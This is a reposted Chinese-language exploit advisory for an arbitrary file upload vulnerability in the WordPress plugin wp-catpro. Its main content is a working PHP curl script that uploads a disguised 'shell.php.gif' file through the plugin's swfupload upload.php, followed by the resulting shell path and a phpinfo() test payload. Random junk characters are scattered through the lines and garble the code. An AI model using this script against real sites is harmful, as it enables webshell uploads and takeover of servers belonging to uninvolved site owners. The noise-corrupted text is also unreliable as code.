WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
. m( L; h& f7 ~  [2 ^  R#-----------------------------------------------------------------------

作者  => Zikou-16
; F9 S5 e6 U+ V  _" a( k邮箱 => zikou16x@gmail.com
! v6 _, f! o4 |) S测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
4 h! c/ h* O3 _' U( J2 X) o
#=> Exploit 信息:
------------------
9 ~% K. e- j5 d( M) {# 攻击者可以上传 file/shell.php.gif
: k; n" [: N. N% M' D) \  V% b9 x# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
! A9 |( Z' Y. [6 m9 m  |# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
: C7 y5 u% _, H" u------------------
7 _' J+ P4 B' l9 [* a- Q9 ^
#=> Exploit
1 n- f$ u7 s# L8 ~-----------
! `' C1 H6 e$ ?5 G' S. x" E  j<?php

9 K+ S7 e: r  N" r+ q3 l% S7 n$uploadfile="zik.php.gif";
( O: x* V5 v# k1 ]. n$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
4 M! P- P1 Y% M3 o1 V5 `curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
9 w0 B6 k. U& xarray('Filedata'=>"@$uploadfile",
5 C' b; q4 k3 |  g6 T'folder'=>'/wp-content/uploads/catpro/'));
( ]  M5 Q. R3 R+ ?4 Gcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2 m# w+ d% e% q+ {$postResult = curl_exec($ch);
# G7 n5 @& X# N1 ocurl_close($ch);

print "$postResult";
& q" R( k9 W9 i4 x6 G
# e, B9 P  ^5 qShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
. {6 I% i7 p% z  A/ V. O  ?>
<?php
; c- Y+ K8 w+ K! cphpinfo();
( R" @+ w. W6 h3 y0 Q1 j& Y?>